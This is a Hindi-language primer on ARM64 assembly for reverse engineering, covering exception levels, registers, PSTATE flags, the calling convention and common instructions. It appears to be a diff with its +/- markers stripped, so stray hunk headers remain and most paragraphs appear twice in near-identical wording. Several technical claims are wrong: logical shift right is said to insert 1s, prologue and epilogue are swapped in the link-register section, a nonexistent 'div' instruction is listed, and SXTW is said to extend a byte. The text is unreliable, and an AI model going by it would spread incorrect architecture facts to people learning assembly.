ARMv8 आर्किटेक्चर में, निष्पादन स्तर, जिसे अपवाद स्तर (ELs) के रूप में जाना जाता है, निष्पादन वातावरण के विशेषाधिकार स्तर और क्षमताओं को परिभाषित करता है। चार अपवाद स्तर हैं, जो EL0 से EL3 तक फैले हुए हैं, प्रत्येक का एक अलग उद्देश्य है:
1. **EL0 - उपयोगकर्ता मोड**:
- यह सबसे कम विशेषाधिकार स्तर है और नियमित एप्लिकेशन कोड निष्पादित करने के लिए उपयोग किया जाता है।
@ -25,29 +25,29 @@ ARMv8 आर्किटेक्चर में, निष्पादन स
ARM64 में **31 सामान्य-उद्देश्य रजिस्टर** होते हैं, जिन्हें `x0` से `x30` तक लेबल किया गया है। प्रत्येक **64-बिट** (8-बाइट) मान संग्रहीत कर सकता है। जिन ऑपरेशनों के लिए केवल 32-बिट मान की आवश्यकता होती है, उन रजिस्टरों को 32-बिट मोड में w0 से w30 के नामों का उपयोग करके एक्सेस किया जा सकता है।
1. **`x0`** से **`x7`** - ये आमतौर पर स्क्रैच रजिस्टर के रूप में और उपरूटीन को पैरामीटर पास करने के लिए उपयोग किए जाते हैं।
1. **`x0`** से **`x7`** - ये आमतौर पर स्क्रैच रजिस्टर के रूप में और उप-प्रक्रियाओं को पैरामीटर पास करने के लिए उपयोग किए जाते हैं।
- **`x0`** एक फ़ंक्शन का लौटने वाला डेटा भी ले जाता है।
2. **`x8`** - लिनक्स कर्नेल में, `x8` `svc` निर्देश के लिए सिस्टम कॉल नंबर के रूप में उपयोग किया जाता है। **macOS में x16 का उपयोग किया जाता है!**
3. **`x9`** से **`x15`** - अधिक अस्थायी रजिस्टर, अक्सर स्थानीय चर के लिए उपयोग किए जाते हैं।
4. **`x16`** और **`x17`** - **इंट्रा-प्रोसीजर कॉल रजिस्टर**। तात्कालिक मानों के लिए अस्थायी रजिस्टर। इन्हें अप्रत्यक्ष फ़ंक्शन कॉल और PLT (प्रोसीजर लिंक टेबल) स्टब के लिए भी उपयोग किया जाता है।
4. **`x16`** और **`x17`** - **इंट्रा-प्रोसीजर कॉल रजिस्टर**। तात्कालिक मानों के लिए अस्थायी रजिस्टर। इन्हें अप्रत्यक्ष फ़ंक्शन कॉल और PLT (प्रक्रिया लिंक टेबल) स्टब के लिए भी उपयोग किया जाता है।
- **`x16`** **`svc`** निर्देश के लिए **सिस्टम कॉल नंबर** के रूप में **macOS** में उपयोग किया जाता है।
5. **`x18`** - **प्लेटफ़ॉर्म रजिस्टर**। इसे सामान्य-उद्देश्य रजिस्टर के रूप में उपयोग किया जा सकता है, लेकिन कुछ प्लेटफार्मों पर, यह रजिस्टर प्लेटफॉर्म-विशिष्ट उपयोगों के लिए आरक्षित है: विंडोज़ में वर्तमान थ्रेड वातावरण ब्लॉक के लिए पॉइंटर, या वर्तमान **निष्पादित कार्य संरचना को इंगित करने के लिए लिनक्स कर्नेल में**
6. **`x19`** से **`x28`** - ये कॉल-सेव किए गए रजिस्टर हैं। एक फ़ंक्शन को अपने कॉलर के लिए इन रजिस्टरों के मानों को संरक्षित करना चाहिए, इसलिए इन्हें स्टैक में संग्रहीत किया जाता है और कॉलर पर वापस जाने से पहले पुनर्प्राप्त किया जाता है।
7. **`x29`** - **फ्रेम पॉइंटर** स्टैक फ्रेम को ट्रैक करने के लिए। जब एक नया स्टैक फ्रेम बनाया जाता है क्योंकि एक फ़ंक्शन को कॉल किया जाता है, तो **`x29`** रजिस्टर **स्टैक में संग्रहीत** किया जाता है और **नया** फ्रेम पॉइंटर पता (**`sp`** पता) इस रजिस्ट्रि में **संग्रहीत** किया जाता है।
- इस रजिस्टर का उपयोग एक **सामान्य-उद्देश्य रजिस्टि** के रूप में भी किया जा सकता है, हालांकि इसे आमतौर पर **स्थानीय चर** के संदर्भ के रूप में उपयोग किया जाता है।
8. **`x30`** या **`lr`**- **लिंक रजिस्टर**। यह एक `BL` (ब्रांच विद लिंक) या `BLR` (ब्रांच विद लिंक टू रजिस्टर) निर्देश के निष्पादन के समय **लौटने वाले पते** को रखता है, जो **`pc`** मान को इस रजिस्टर में संग्रहीत करता है
- इस रजिस्टर का उपयोग एक **सामान्य-उद्देश्य रजिस्टर** के रूप में भी किया जा सकता है, हालांकि इसे आमतौर पर **स्थानीय चर** के संदर्भ के रूप में उपयोग किया जाता है।
8. **`x30`** या **`lr`**- **लिंक रजिस्टर**। यह एक `BL` (ब्रांच विद लिंक) या `BLR` (ब्रांच विद लिंक टू रजिस्टर) निर्देश के निष्पादन के समय **रिटर्न पता** को रखता है, **`pc`** मान को इस रजिस्टर में संग्रहीत करके
- इसका उपयोग किसी अन्य रजिस्टर की तरह भी किया जा सकता है।
- यदि वर्तमान फ़ंक्शन एक नए फ़ंक्शन को कॉल करने जा रहा है और इसलिए `lr` को ओवरराइट करेगा, तो यह इसे स्टैक में शुरुआत में संग्रहीत करेगा, यह उपसंहार है (`stp x29, x30 , [sp, #-48]; mov x29, sp` -> `fp` और `lr` को स्टोर करें, स्थान उत्पन्न करें और नया `fp` प्राप्त करें) और अंत में इसे पुनर्प्राप्त करें, यह प्रस्तावना है (`ldp x29, x30, [sp], #48; ret` -> `fp` और `lr` को पुनर्प्राप्त करें और लौटें)।
9. **`sp`** - **स्टैक पॉइंटर**, जिसका उपयोग स्टैक के शीर्ष को ट्रैक करने के लिए किया जाता है।
- **`sp`** मान को हमेशा कम से कम एक **क्वाडवर्ड** **संरेखण** पर रखा जाना चाहिए, अन्यथा एक संरेखण अपवाद हो सकता है।
10. **`pc`** - **प्रोग्राम काउंटर**, जो अगले निर्देश की ओर इशारा करता है। इस रजिस्टर को केवल अपवाद उत्पन्न करने, अपवाद लौटने और शाखाओं के माध्यम से अपडेट किया जा सकता है। केवल सामान्य निर्देश जो इस रजिस्टर को पढ़ सकते हैं, वे लिंक के साथ शाखा निर्देश (BL, BLR) हैं जो **`pc`** पत को **`lr`** (लिंक रजिस्टर) में संग्रहीत करते हैं।
11. **`xzr`** - **ज़ीरो रजिस्टर**। इसे इसके **32**-बिट रजिस्टर रूप में **`wzr`** भी कहा जाता है। इसका उपयोग आसानी से शून्य मान प्राप्त करने (सामान्य ऑपरेशन) या **`subs`** का उपयोग करके तुलना करने के लिए किया जा सकता है जैसे **`subs XZR, Xn, #10`** परिणामस्वरूप डेटा को कहीं भी संग्रहीत नहीं करता ( **`xzr`** में)।
10. **`pc`** - **प्रोग्राम काउंटर**, जो अगले निर्देश की ओर इशारा करता है। इस रजिस्टर को केवल अपवाद उत्पन्न करने, अपवाद लौटने और शाखाओं के माध्यम से अपडेट किया जा सकता है। केवल सामान्य निर्देश जो इस रजिस्टर को पढ़ सकते हैं वे लिंक के साथ शाखा निर्देश (BL, BLR) हैं जो **`pc`** पत को **`lr`** (लिंक रजिस्टर) में संग्रहीत करते हैं।
11. **`xzr`** - **ज़ीरो रजिस्टर**। इसे इसके **32**-बिट रजिस्टर रूप में **`wzr`** भी कहा जाता है। इसका उपयोग आसानी से शून्य मान प्राप्त करने (सामान्य ऑपरेशन) या **`subs`** का उपयोग करके तुलना करने के लिए किया जा सकता है जैसे **`subs XZR, Xn, #10`** परिणामस्वरूप डेटा को कहीं भी संग्रहीत किए बिना ( **`xzr`** में)।
**`Wn`** रजिस्टर **`Xn`** रजिस्टर का **32-बिट** संस्करण हैं।
### SIMD और फ्लोटिंग-पॉइंट रजिस्टर
इसके अलावा, **128-बिट लंबाई के 32 रजिस्टर** हैं जिन्हें अनुकूलित सिंगल इंस्ट्रक्शन मल्टीपल डेटा (SIMD) संचालन में और फ्लोटिंग-पॉइंट अंकगणित करने के लिए उपयोग किया जा सकता है। इन्हें Vn रजिस्टर कहा जाता है, हालांकि वे **64**-बिट, **32**-बिट, **16**-बिट और **8**-बिट में भी कार्य कर सकते हैं और तब इन्हें **`Qn`**, **`Dn`**, **`Sn`**, **`Hn`** और **`Bn`** कहा जाता है।
इसके अलावा, **128-बिट लंबाई के 32 रजिस्टर** हैं जिन्हें अनुकूलित सिंगल इंस्ट्रक्शन मल्टीपल डेटा (SIMD) ऑपरेशनों में और फ्लोटिंग-पॉइंट अंकगणित करने के लिए उपयोग किया जा सकता है। इन्हें Vn रजिस्टर कहा जाता है, हालांकि वे **64**-बिट, **32**-बिट, **16**-बिट और **8**-बिट में भी कार्य कर सकते हैं और तब इन्हें **`Qn`**, **`Dn`**, **`Sn`**, **`Hn`** और **`Bn`** कहा जाता है।
### सिस्टम रजिस्टर
@ -55,7 +55,7 @@ ARM64 में **31 सामान्य-उद्देश्य रजिस
इन्हें केवल समर्पित विशेष निर्देश **`mrs`** और **`msr`** का उपयोग करके पढ़ा या सेट किया जा सकता है।
विशेष रजिस्टर **`TPIDR_EL0`** और **`TPIDDR_EL0`** आमतौर पर रिवर्स इंजीनियरिंग करते समय पाए जाते हैं। `EL0` उपसर्ग उस **न्यूनतम अपवाद** को इंगित करता है जिससे रजिस्टर को एक्सेस किया जा सकता है (इस मामले में EL0 नियमित अपवाद (विशेषाधिकार) स्तर है जिस पर नियमित प्रोग्राम चलते हैं)।\
इन्हें आमतौर पर **थ्रेड-स्थानीय भंडारण** मेमोरी क्षेत्र के **बेस पते** को संग्रहीत करने के लिए उपयोग किया जाता है। आमतौर पर पहला पढ़ने और लिखने के लिए EL0 में चलने वाले प्रोग्राम के लिए पढ़ने योग्य और लिखने योग्य होता है, लेकिन दूसरा EL0 से पढ़ा जा सकता है और EL1 से लिखा जा सकता है (जैसे कर्नेल)।
इनका उपयोग आमतौर पर **थ्रेड-स्थानीय भंडारण** मेमोरी क्षेत्र के **बेस पते** को संग्रहीत करने के लिए किया जाता है। आमतौर पर पहला पढ़ने और लिखने के लिए EL0 में चलने वाले प्रोग्राम के लिए पढ़ने योग्य और लिखने योग्य होता है, लेकिन दूसरा EL0 से पढ़ा जा सकता है और EL1 से लिखा जा सकता है (जैसे कर्नेल)।
- `mrs x0, TPIDR_EL0 ; TPIDR_EL0 को x0 में पढ़ें`
- `msr TPIDR_EL0, X0 ; x0 को TPIDR_EL0 में लिखें`
@ -82,7 +82,7 @@ ARM64 में **31 सामान्य-उद्देश्य रजिस
- वर्तमान **रजिस्टर चौड़ाई (`nRW`) ध्वज**: यदि ध्वज का मान 0 है, तो प्रोग्राम फिर से शुरू होने पर AArch64 निष्पादन स्थिति में चलेगा।
- वर्तमान **अपवाद स्तर** (**`EL`**): EL0 में चलने वाला एक नियमित प्रोग्राम का मान 0 होगा।
- **सिंगल स्टेपिंग** ध्वज (**`SS`**): डिबगर्स द्वारा एक सिंगल स्टेप सेट करने के लिए उपयोग किया जाता है **`SPSR_ELx`** के भीतर एक अपवाद के माध्यम से SS ध्वज को 1 पर सेट करके। प्रोग्राम एक कदम चलेगा और एक सिंगल स्टेप अपवाद जारी करेगा।
- **सिंगल स्टेपिंग** ध्वज (**`SS`**): डिबगर्स द्वारा एक सिंगल स्टेप सेट करने के लिए उपयोग किया जाता है, **`SPSR_ELx`** के भीतर SS ध्वज को 1 पर सेट करके एक अपवाद के माध्यम से। प्रोग्राम एक कदम चलेगा और एक सिंगल स्टेप अपवाद जारी करेगा।
- **अवैध अपवाद** स्थिति ध्वज (**`IL`**): इसका उपयोग तब किया जाता है जब एक विशेषाधिकार प्राप्त सॉफ़्टवेयर एक अवैध अपवाद स्तर स्थानांतरण करता है, यह ध्वज 1 पर सेट किया जाता है और प्रोसेसर एक अवैध स्थिति अपवाद उत्पन्न करता है।
- **`DAIF`** ध्वज: ये ध्वज एक विशेषाधिकार प्राप्त प्रोग्राम को कुछ बाहरी अपवादों को चयनात्मक रूप से मास्क करने की अनुमति देते हैं।
- यदि **`A`** 1 है, तो इसका अर्थ है कि **असिंक्रोनस एबॉर्ट्स** उत्पन्न होंगे। **`I`** बाहरी हार्डवेयर **इंटरप्ट रिक्वेस्ट** (IRQs) का उत्तर देने के लिए कॉन्फ़िगर करता है। और F **फास्ट इंटरप्ट रिक्वेस्ट** (FIRs) से संबंधित है।
@ -90,9 +90,9 @@ ARM64 में **31 सामान्य-उद्देश्य रजिस
## **कॉलिंग कन्वेंशन (ARM64v8)**
ARM64 कॉलिंग कन्वेंशन निर्दिष्ट करता है कि एक फ़ंक्शन के लिए **पहले आठ पैरामीटर** रजिस्टर **`x0` से `x7`** में पास किए जाते हैं। **अतिरिक्त** पैरामीटर **स्टैक** पर पास किए जाते हैं। **लौटने** वाला मान रजिस्टर **`x0`** में वापस पास किया जाता है, या **`x1`** में भी **यदि यह 128 बिट लंबा है****`x19`** से **`x30`** और **`sp`** रजिस्टर को फ़ंक्शन कॉल के बीच **संरक्षित** किया जाना चाहिए।
ARM64 कॉलिंग कन्वेंशन निर्दिष्ट करता है कि एक फ़ंक्शन के लिए **पहले आठ पैरामीटर** रजिस्टर **`x0` से `x7`** में पास किए जाते हैं। **अतिरिक्त** पैरामीटर **स्टैक** पर पास किए जाते हैं। **रिटर्न** मान रजिस्टर **`x0`** में वापस पास किया जाता है, या **`x1`** में भी **यदि यह 128 बिट लंबा है****`x19`** से **`x30`** और **`sp`** रजिस्टर को फ़ंक्शन कॉल के बीच **संरक्षित** किया जाना चाहिए।
जब असेंबली में एक फ़ंक्शन को पढ़ते हैं, तो **फ़ंक्शन प्रस्तावना और उपसंहार** की तलाश करें। **प्रस्तावना** आमतौर पर **फ्रेम पॉइंटर (`x29`) को सहेजने**, **नए फ्रेम पॉइंटर को सेट करने**, और **स्टैक स्पेस आवंटित करने** में शामिल होती है। **उपसंहार** आमतौर पर **सहेजे गए फ्रेम पॉइंटर को पुनर्स्थापित करने** और फ़ंक्शन से **लौटने** में शामिल होता है।
जब असेंबली में एक फ़ंक्शन को पढ़ते हैं, तो **फ़ंक्शन प्रस्तावना और उपसंहार** की तलाश करें। **प्रस्तावना** आमतौर पर **फ्रेम पॉइंटर (`x29`) को सहेजने**, **नए फ्रेम पॉइंटर** को सेट करने और **स्टैक स्पेस आवंटित करने** में शामिल होती है। **उपसंहार** आमतौर पर **सहेजे गए फ्रेम पॉइंटर को पुनर्स्थापित करने** और फ़ंक्शन से **लौटने** में शामिल होता है।
### स्विफ्ट में कॉलिंग कन्वेंशन
@ -102,28 +102,28 @@ ARM64 कॉलिंग कन्वेंशन निर्दिष्ट
ARM64 निर्देश आमतौर पर **फॉर्मेट `opcode dst, src1, src2`** में होते हैं, जहाँ **`opcode`** वह **ऑपरेशन** है जिसे किया जाना है (जैसे `add`, `sub`, `mov`, आदि), **`dst`** वह **गंतव्य** रजिस्टर है जहाँ परिणाम संग्रहीत किया जाएगा, और **`src1`** और **`src2`** वह **स्रोत** रजिस्टर हैं। तात्कालिक मानों का भी स्रोत रजिस्टर के स्थान पर उपयोग किया जा सकता है।
- **`mov`**: एक **रजिस्टर** से दूसरे में एक मान **स्थानांतरित** करें।
- उदाहरण: `mov x0, x1` — यह `x1` से `x0` में मान स्थानांतरित करता है।
- **`mov`**: एक **रजिस्टर** से दूसरे में मान **स्थानांतरित** करें।
- उदाहरण: `mov x0, x1` — यह मान को `x1` से `x0` में स्थानांतरित करता है।
- **`ldr`**: **मेमोरी** से एक मान को **रजिस्टर** में **लोड** करें।
- उदाहरण: `ldr x0, [x1]` — यह `x1` द्वारा इंगित मेमोरी स्थान से एक मान को `x0` में लोड करता है।
- **ऑफसेट मोड**: एक ऑफसेट जो मूल पॉइंटर को प्रभावित करता है, उदाहरण के लिए:
- **ऑफसेट मोड**: एक ऑफसेट जो ओरिजिन पॉइंटर को प्रभावित करता है, उदाहरण के लिए:
- `ldr x2, [x1, #8]`, यह x2 में x1 + 8 से मान लोड करेगा।
- `ldr x2, [x0, x1, lsl #2]`, यह x2 में x0 के ऐरे से एक वस्तु लोड करेगा, स्थिति x1 (सूचकांक) \* 4 से।
- **पूर्व-सूचीबद्ध मोड**: यह मूल पर गणनाएँ लागू करेगा, परिणाम प्राप्त करेगा और नए मूल को भी मूल में संग्रहीत करेगा।
- **पूर्व-सूचीबद्ध मोड**: यह ओरिजिन पर गणनाएँ लागू करेगा, परिणाम प्राप्त करेगा और नए ओरिजिन को भी ओरिजिन में संग्रहीत करेगा।
- `ldr x2, [x1, #8]!`, यह `x1 + 8` को `x2` में लोड करेगा और `x1` में `x1 + 8` का परिणाम संग्रहीत करेगा।
- `str lr, [sp, #-4]!`, लिंक रजिस्टर को sp में संग्रहीत करें और रजिस्टर sp को अपडेट करें।
- **पोस्ट-सूचीबद्ध मोड**: यह पिछले वाले की तरह है लेकिन मेमोरी पते को एक्सेस किया जाता है और फिर ऑफसेट की गणना की जाती है और संग्रहीत किया जाता है।
- `ldr x0, [x1], #8`, `x1` में `x0` लोड करें और `x1` को `x1 + 8` के साथ अपडेट करें।
- **पोस्ट-सूचीबद्ध मोड**: यह पिछले वाले की तरह है लेकिन मेमोरी पते को एक्सेस किया जाता है और फिर ऑफसेट की गणना की जाती है और संग्रहीत की जाती है।
- `ldr x0, [x1], #8`, `x1` को `x0` में लोड करें और `x1` को `x1 + 8` के साथ अपडेट करें।
- **PC-सापेक्ष पता लगाना**: इस मामले में लोड करने के लिए पता PC रजिस्टर के सापेक्ष गणना की जाती है।
- `ldr x1, =_start`, यह `_start` प्रतीक के प्रारंभ होने का पता x1 में लोड करेगा जो वर्तमान PC से संबंधित है।
- **`str`**: एक **रजिस्टर** से **मेमोरी** में एक मान **स्टोर** करें।
- **`str`**: एक **रजिस्टर** से **मेमोरी** में मान **स्टोर** करें।
- उदाहरण: `str x0, [x1]` — यह `x0` में मान को `x1` द्वारा इंगित मेमोरी स्थान में संग्रहीत करता है।
- **`ldp`**: **रजिस्टर की जोड़ी लोड करें**। यह निर्देश **दो रजिस्टर** को **लगातार मेमोरी** स्थानों से लोड करता है। मेमोरी पता आमतौर पर किसी अन्य रजिस्टर में मान के साथ एक ऑफसेट जोड़कर बनाया जाता है।
- उदाहरण: `ldp x0, x1, [x2]` — यह `x0` और `x1` को `x2` और `x2 + 8` पर मेमोरी स्थानों से लोड करता है।
- **`stp`**: **रजिस्टर की जोड़ी स्टोर करें**। यह निर्देश **दो रजिस्टर** को **लगातार मेमोरी** स्थानों में संग्रहीत करता है। मेमोरी पता आमतौर पर किसी अन्य रजिस्टर में मान के साथ एक ऑफसेट जोड़कर बनाया जाता है।
- उदाहरण: `stp x0, x1, [sp]` — यह `x0` और `x1` को `sp` और `sp + 8` पर मेमोरी स्थानों में संग्रहीत करता है।
- `stp x0, x1, [sp, #16]!` — यह `x0` और `x1` को `sp+16` और `sp + 24` पर मेमोरी स्थानों में संग्रहीत करता है, और `sp` को `sp+16` के साथ अपडेट करता है।
- **`add`**: दो रजिस्टर के मानों को जोड़ें और परिणाम को एक रजिस्टर में संग्रहीत करें।
- **`add`**: दो रजिस्टरों के मानों को जोड़ें और परिणाम को एक रजिस्टर में संग्रहीत करें।
- सिंटैक्स: add(s) Xn1, Xn2, Xn3 | #imm, \[shift #N | RRX]
- Xn1 -> गंतव्य
- Xn2 -> ऑपरेन्ड 1
@ -132,59 +132,59 @@ ARM64 निर्देश आमतौर पर **फॉर्मेट `opco
- उदाहरण: `add x0, x1, x2` — यह `x1` और `x2` में मानों को जोड़ता है और परिणाम को `x0` में संग्रहीत करता है।
- `add x5, x5, #1, lsl #12` — यह 4096 के बराबर है (1 को 12 बार शिफ्ट करना) -> 1 0000 0000 0000 0000
- **`adds`** यह एक `add` करता है और ध्वज को अपडेट करता है।
- **`sub`**: दो रजिस्टर के मानों को घटाएं और परिणाम को एक रजिस्टर में संग्रहीत करें।
- **`sub`**: दो रजिस्टरों के मानों को घटाएं और परिणाम को एक रजिस्टर में संग्रहीत करें।
- **`add`** **सिंटैक्स** की जांच करें।
- उदाहरण: `sub x0, x1, x2` — यह `x2` के मान को `x1` से घटाता है और परिणाम को `x0` में संग्रहीत करता है।
- **`subs`** यह घटाव की तरह है लेकिन ध्वज को अपडेट करता है।
- **`mul`**: **दो रजिस्टर** के मानों को गुणा करें और परिणाम को एक रजिस्टर में संग्रहीत करें।
- **`mul`**: **दो रजिस्टरों** के मानों को गुणा करें और परिणाम को एक रजिस्टर में संग्रहीत करें।
- उदाहरण: `mul x0, x1, x2` — यह `x1` और `x2` में मानों को गुणा करता है और परिणाम को `x0` में संग्रहीत करता है।
- **`div`**: एक रजिस्टर के मान को दूसरे से विभाजित करें और परिणाम को एक रजिस्टर में संग्रहीत करें।
- उदाहरण: `div x0, x1, x2` — यह `x1` के मान को `x2` से विभाजित करता है और परिणाम को `x0` में संग्रहीत करता है।
- **`lsl`**, **`lsr`**, **`asr`**, **`ror`, `rrx`**:
- **तार्किक शिफ्ट बाएं**: अंत से 0 जोड़ें और अन्य बिट्स को आगे बढ़ाएं (n-बार 2 से गुणा करें)
- **तार्किक शिफ्ट दाएं**: शुरुआत में 1 जोड़ें और अन्य बिट्स को पीछे की ओर बढ़ाएं (unsigned में n-बार 2 से विभाजित करें)
- **गणितीय शिफ्ट दाएं**: **`lsr`** की तरह, लेकिन यदि सबसे महत्वपूर्ण बिट 1 है, तो 0 जोड़ने के बजाय, **1 जोड़ें** (signed में n-बार 2 से विभाजित करें)
- **दाएं घुमाना**: **`lsr`** की तरह लेकिन जो भी दाएं से हटा दिया गया है उसे बाएं जोड़ा जाता है।
- **एक्सटेंड के साथ दाएं घुमाना**: **`ror`** की तरह, लेकिन कैरी ध्वज को "सबसे महत्वपूर्ण बिट" के रूप में। इसलिए कैरी ध्वज को बिट 31 में स्थानांतरित किया जाता है और हटाए गए बिट को कैरी ध्वज में
- **`bfm`**: **बिट फील्ड मूव**, ये ऑपरेशन **`0...n`** बिट्स को एक मान से कॉपी करते हैं और उन्हें **`m..m+n`** स्थानों में रखते हैं। **`#s`** सबसे बाएं बिट स्थिति को निर्दिष्ट करता है और **`#r`** दाएं घुमाने की मात्रा को निर्दिष्ट करता है
- बिटफील्ड मूव: `BFM Xd, Xn, #r`
- साइन बिटफील्ड मूव: `SBFM Xd, Xn, #r, #s`
- अनसाइन बिटफील्ड मूव: `UBFM Xd, Xn, #r, #s`
- **बिटफील्ड निकालें और डालें:** एक रजिस्टर से एक बिटफील्ड को कॉपी करें और इसे दूसरे रजिस्टर में कॉपी करें।
- **तर्कसंगत शिफ्ट बाएं**: अंत से 0 जोड़ें और अन्य बिट्स को आगे बढ़ाएं (n-बार 2 से गुणा करें)
- **तर्कसंगत शिफ्ट दाएं**: शुरुआत में 1 जोड़ें और अन्य बिट्स को पीछे की ओर बढ़ाएं (unsigned में n-बार 2 से विभाजित करें)
- **गणितीय शिफ्ट दाएं**: **`lsr`** की तरह, लेकिन यदि सबसे महत्वपूर्ण बिट 1 है, तो 0 जोड़ने के बजाय, **1s जोड़े जाते हैं** (signed में n-बार 2 से विभाजित करें)
- **दाएं घुमाना**: **`lsr`** की तरह लेकिन जो कुछ दाएं से हटा दिया गया है उसे बाएं जोड़ा जाता है।
- **विस्तारित के साथ दाएं घुमाना**: **`ror`** की तरह, लेकिन कैरी ध्वज को "सबसे महत्वपूर्ण बिट" के रूप में। इसलिए कैरी ध्वज को बिट 31 में स्थानांतरित किया जाता है और हटा दिया गया बिट कैरी ध्वज में होता है
- **`bfm`**: **बिट फील्ड मूव**, ये ऑपरेशन **`0...n`** से बिट्स को एक मान से कॉपी करते हैं और उन्हें **`m..m+n`** में रखते हैं। **`#s`** सबसे **बाएं बिट** स्थिति को निर्दिष्ट करता है और **`#r`** **दाएं घुमाने की मात्रा** को।
- बिटफील्ड मूव: `BFM Xd, Xn, #r`
- साइन बिटफील्ड मूव: `SBFM Xd, Xn, #r, #s`
- अनसाइन बिटफील्ड मूव: `UBFM Xd, Xn, #r, #s`
- **बिटफील्ड निकालें और डालें:** एक रजिस्टर से एक बिटफील्ड को कॉपी करें और इसे दूसरे रजिस्टर में कॉपी करें।
- **`BFI X1, X2, #3, #4`** X1 के 3वें बिट से X2 के 4 बिट्स डालें।
- **`BFXIL X1, X2, #3, #4`** X2 के 3वें बिट से चार बिट्स निकालें और उन्हें X1 में कॉपी करें।
- **`SBFIZ X1, X2, #3, #4`** X2 से 4 बिट्स को साइन-एक्सटेंड करें और उन्हें X1 में डालें, बिट स्थिति 3 से दाएं बिट्स को शून्य करते हुए।
- **`SBFX X1, X2, #3, #4`** X2 से 4 बिट्स को 3 से शुरू करते हुए निकालता है, उन्हें साइन-एक्सटेंड करता है, और परिणाम को X1 में रखता है।
- **`SBFX X1, X2, #3, #4`** X2 से बिट 3 से शुरू होने वाले 4 बिट्स को निकालता है, उन्हें साइन-एक्सटेंड करता है, और परिणाम को X1 में रखता है।
- **`UBFIZ X1, X2, #3, #4`** X2 से 4 बिट्स को शून्य-एक्सटेंड करता है और उन्हें X1 में डालता है, बिट स्थिति 3 से दाएं बिट्स को शून्य करते हुए।
- **`UBFX X1, X2, #3, #4`** X2 से 4 बिट्स को 3 से शुरू करते हुए निकालता है और शून्य-एक्सटेंडेड परिणाम को X1 में रखता है।
- **`UBFX X1, X2, #3, #4`** X2 से बिट 3 से शुरू होने वाले 4 बिट्स को निकालता है और शून्य-एक्सटेंडेड परिणाम को X1 में रखता है।
- **साइन एक्सटेंड टू X:** एक मान के साइन को बढ़ाता है (या अनसाइन संस्करण में केवल 0 जोड़ता है) ताकि इसके साथ ऑपरेशन किया जा सके:
- **`SXTB X1, W2`** W2 से **X1** में एक बाइट के साइन को बढ़ाता है (`W2` `X2` का आधा है) ताकि 64-बिट भरे।
- **`SXTH X1, W2`** W2 से **X1** में 16-बिट संख्या के साइन को बढ़ाता है ताकि 64-बिट भरे।
- **`SXTW X1, W2`** W2 से **X1** में एक बाइट के साइन को बढ़ाता है ताकि 64-बिट भरे।
- **`UXTB X1, W2`** W2 से **X1** में 0 जोड़ता है (अनसाइन) ताकि 64-बिट भरे।
- **`extr`:** निर्दिष्ट **रजिस्टर के जोड़े से बिट्स निकालता है**।
- उदाहरण: `EXTR W3, W2, W1, #3` यह **W1+W2 को जोड़ता है** और **W2 के बिट 3 से W1 के बिट 3 तक** निकालता है और इसे W3 में संग्रहीत करता है।
- **`cmp`**: **दो रजिस्टर की तुलना करें** और स्थिति ध्वज सेट करें। यह **`subs`** का एक **उपनाम** है जो गंतव्य रजिस्टर को शून्य रजिस्टर पर सेट करता है। यह जानने के लिए उपयोगी है कि `m == n`
- **`SXTB X1, W2`** W2 से **X1** तक एक बाइट के साइन को बढ़ाता है (`W2` `X2` का आधा है) ताकि 64-बिट भरे।
- **`SXTH X1, W2`** W2 से **X1** तक एक 16-बिट संख्या के साइन को बढ़ाता है ताकि 64-बिट भरे।
- **`SXTW X1, W2`** W2 से **X1** तक एक बाइट के साइन को बढ़ाता है ताकि 64-बिट भरे।
- **`UXTB X1, W2`** W2 से **X1** तक एक बाइट में 0 जोड़ता है (अनसाइन) ताकि 64-बिट भरे।
- **`extr`:** निर्दिष्ट **रजिस्टरों के जोड़े से बिट्स निकालता है**।
- उदाहरण: `EXTR W3, W2, W1, #3` यह **W1+W2 को जोड़ता है** और **W2 के बिट 3 से W1 के बिट 3 तक** प्राप्त करता है और इसे W3 में संग्रहीत करता है।
- **`cmp`**: **दो रजिस्टरों की तुलना करें** और स्थिति ध्वज सेट करें। यह **`subs`** का एक **उपनाम** है जो गंतव्य रजिस्टर को शून्य रजिस्टर पर सेट करता है। यह जानने के लिए उपयोगी है कि `m == n`
- यह **`subs`** के समान सिंटैक्स का समर्थन करता है।
- उदाहरण: `cmp x0, x1` — यह `x0` और `x1` में मानों की तुलना करता है और स्थिति ध्वज को तदनुसार सेट करता है।
- **`cmn`**: **नकारात्मक** ऑपरेन्ड की तुलना करें। इस मामले में यह **`adds`** का एक **उपनाम** है और समान सिंटैक्स का समर्थन करता है। यह जानने के लिए उपयोगी है कि `m == -n`
- **`ccmp`**: शर्तीय तुलना, यह एक तुलना है जो केवल तभी की जाएगी जब एक पूर्ववर्ती तुलना सत्य थी और विशेष रूप से nzcv बिट्स को सेट करेगी।
- **`ccmp`**: शर्तीय तुलना, यह एक तुलना है जो केवल तभी की जाएगी जब एक पूर्ववर्ती तुलना सत्य हो और विशेष रूप से nzcv बिट्स को सेट करेगी।
- `cmp x1, x2; ccmp x3, x4, 0, NE; blt _func` -> यदि x1 != x2 और x3 < x4, func पर कूदें
- इसका कारण यह है कि **`ccmp`** केवल तब निष्पादित होगा जब **पिछली `cmp` एक `NE`** थी, यदि यह नहीं थी तो बिट्स `nzcv` को 0 पर सेट कर दिया जाएगा (जो `blt` तुलना को संतुष्ट नहीं करेगा)।
- इसका कारण यह है कि **`ccmp`** केवल तब निष्पादित होगा जब **पिछली `cmp` एक `NE`** थी, यदि यह नहीं थी तो बिट्स `nzcv` को 0 पर सेट कर देंगे (जो `blt` तुलना को संतुष्ट नहीं करेगा)।
- इसे `ccmn` के रूप में भी उपयोग किया जा सकता है (समान लेकिन नकारात्मक, जैसे `cmp` बनाम `cmn`)।
- **`tst`**: यह जांचता है कि क्या तुलना के मान दोनों 1 हैं (यह कहीं भी परिणाम संग्रहीत किए बिना ANDS की तरह काम करता है)। यह एक रजिस्टर के मान के साथ जांचने के लिए उपयोगी है और यह जांचता है कि क्या रजिस्टर में निर्दिष्ट मान के बिट्स में से कोई 1 है।
- **`tst`**: यह जांचता है कि क्या तुलना के मान दोनों 1 हैं (यह किसी भी परिणाम को कहीं भी संग्रहीत किए बिना ANDS की तरह काम करता है)। यह एक रजिस्टर के मान के साथ जांचने के लिए उपयोगी है और यह जांचता है कि क्या रजिस्टर में निर्दिष्ट मान के बिट्स में से कोई 1 है।
- उदाहरण: `tst X1, #7` X1 के अंतिम 3 बिट्स में से कोई 1 है या नहीं, इसकी जांच करें।
- **`teq`**: XOR ऑपरेशन परिणाम को छोड़कर।
- **`b`**: बिना शर्त शाखा।
- उदाहरण: `b myFunction`
